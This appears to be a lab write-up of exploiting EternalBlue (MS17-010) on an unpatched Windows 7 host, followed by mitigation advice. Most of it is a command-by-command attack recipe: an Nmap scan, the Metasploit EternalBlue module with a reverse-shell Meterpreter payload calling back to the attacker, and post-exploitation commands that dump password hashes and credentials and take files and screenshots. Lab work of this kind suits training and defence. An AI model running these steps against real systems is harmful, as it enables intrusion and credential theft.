🔧 Tools Used
- Kali Linux (Attacker)
- Windows 7 SP1 (Victim)
- Nmap
- Metasploit Framework
- SMBv1
- Command Line / Terminal
🔎 Step 1: Network Discovery
Use Nmap to identify hosts and open SMB ports on the network:
nmap -sS -sV -p 445 192.168.10.0/24
Expected output:
- Host: 192.168.10.12
- Port 445/tcp open
- Service: Microsoft Windows SMB
💣 Step 2: EternalBlue Exploitation (MS17-010)
Launch Metasploit:
msfconsole
Search for EternalBlue module:
search eternalblue
Use the SMB exploit module:
use exploit/windows/smb/ms17_010_eternalblue
Set required parameters:
set RHOST 192.168.10.12
set LHOST <your_kali_ip>
set PAYLOAD windows/x64/meterpreter/reverse_tcp
exploit
📟 Step 3: Post-Exploitation with Meterpreter
Once you gain a Meterpreter session:
getuid
sysinfo
hashdump
Escalate privileges:
load kiwi
creds_all
Capture evidence:
screenshot
download sensitive_files
🛡️ Step 4: Mitigation Recommendations
- Apply Microsoft patch MS17-010
- Disable SMBv1 protocol
- Use host-based firewalls to block unnecessary SMB traffic
- Segment internal networks
- Regularly update and monitor critical systems
✅ Outcome
- Gained SYSTEM-level access on unpatched Windows 7 via EternalBlue
- Captured user hashes, screenshots, and sensitive files
- Validated risk of unpatched legacy systems in production
